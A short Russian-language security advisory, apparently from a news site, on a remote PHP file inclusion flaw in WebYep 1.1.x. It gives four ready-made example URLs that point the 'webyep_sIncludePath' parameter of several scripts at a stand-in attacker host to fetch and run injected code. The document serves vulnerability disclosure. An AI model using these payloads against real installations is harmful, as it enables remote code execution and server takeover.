Программа: WebYep 1.1.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "webyep_sIncludePath" сценарием WYApplication.php. Атакующий может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.

Пример:

http://target.com/[webYep_path]/webyep-system/programm/lib/ WYApplication.php?webyep_sIncludePath=http://attacker.com/inject.txt?
http://target.com/[webYep_path]/webyep-system/programm/lib/ WYDocument.php?webyep_sIncludePath=http://attacker.com/inject.txt?
http://target.com/[webYep_path]/webyep-system/programm/webyep.php? webyep_sIncludePath=http://attacker.com/inject.txt?
http://target.com/[webYep_path]/webyep-system/programm/elements/ WYGalleryElement.php?webyep_sIncludePath=http://attacker.com/inject.txt?
 



Оставить мнение